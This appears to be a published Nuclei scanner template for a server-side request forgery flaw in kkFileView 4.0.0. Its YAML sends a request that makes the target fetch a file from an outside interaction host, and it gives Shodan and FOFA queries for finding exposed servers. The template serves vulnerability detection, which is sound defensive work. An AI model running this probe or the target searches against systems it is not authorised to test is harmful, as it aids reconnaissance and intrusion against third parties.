kkFileView 4.0.0 - Server-Side Request Forgery

ID: kkfileview-ssrf

Severity: high

Author: Arm!tage

Tags: ssrf,kkfileview,keking

Description

kkFileView 4.0.0 is susceptible to server-side request forgery

YAML Source

id: kkfileview-ssrf

info:
  name: kkFileView 4.0.0 - Server-Side Request Forgery
  author: Arm!tage
  severity: high
  description: |
    kkFileView 4.0.0 is susceptible to server-side request forgery
  reference:
    - https://github.com/kekingcn/kkFileView/issues/296
  classification:
    cwe-id: CWE-918
    cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - app="kkFileView"
      - app="kkfileview"
      - body="kkfileview"
  tags: ssrf,kkfileview,keking

http:
  - method: GET
    path:
      - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}"

    extractors:
      - type: regex
        name: data
        group: 1
        regex:
          - 'hidden id="textData" value="([A-Za-z0-9=]+)"\/>'
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains(base64_decode(data), "Disallow")
# digest: 4a0a004730450221009c3276dda43a20b455a04b9c2e70a3319e9dc12996c8cd21ac4e1495c6c44b81022011ada41a8f920531e821966e0731acf487b82225056d26559ddd264811bb5278:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/kkfileview-ssrf.yaml"

View on Github